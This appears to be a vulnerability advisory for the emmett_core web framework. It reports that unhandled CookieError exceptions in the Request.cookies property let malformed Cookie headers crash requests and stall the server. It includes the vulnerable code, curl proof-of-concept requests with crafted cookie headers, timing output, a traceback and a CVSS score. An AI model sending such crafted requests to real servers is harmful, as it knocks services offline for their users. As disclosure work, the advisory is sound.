The cookies property in emmett_core.http.wrappers.Request does not handle
CookieError exceptions when parsing malformed Cookie headers. This allows
unauthenticated attackers to trigger HTTP 500 errors and cause denial of service.
Location: emmett_core/http/wrappers/__init__.py (line 64)
Vulnerable Code:
@cachedprop
def cookies(self) -> SimpleCookie:
cookies: SimpleCookie = SimpleCookie()
for cookie in self.headers.get("cookie", "").split(";"):
cookies.load(cookie) # No exception handling
return cookies
Sending cookies containing special characters such as /(){} will result in insufficient error handling and a server error.
$ curl -w "\nTime: %{time_total}s\n" http://localhost:8000/ -H "Cookie:/security=test"
Internal error
Time: 0.024363s
After the same error occurs several times, the server cannot process it normally.
$ curl -w "\nTime: %{time_total}s\n" http://localhost:8000/ -H "Cookie:(security=test"
Internal error
Time: 60.069334s
$ curl -w "\nTime: %{time_total}s\n" http://localhost:8000/ -H "Cookie:security=test"
Internal error
Time: 60.074031s
This is server log.
[2026-02-03 08:23:40,541] ERROR in handlers: Application exception:
Traceback (most recent call last):
File "/home/geonwoo/.local/lib/python3.13/site-packages/emmett/rsgi/handlers.py", line 70, in dynamic_handler
http = await self.router.dispatch(request, response)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/geonwoo/.local/lib/python3.13/site-packages/emmett_core/routing/router.py", line 240, in dispatch
return await match.dispatch(reqargs, response)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/geonwoo/.local/lib/python3.13/site-packages/emmett_core/routing/dispatchers.py", line 57, in dispatch
await self._parallel_flow(self.flow_open)
File...
1.3.11Exploitability
AV:NAC:LPR:NUI:NScope
S:UImpact
C:NI:NA:H7.5/CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H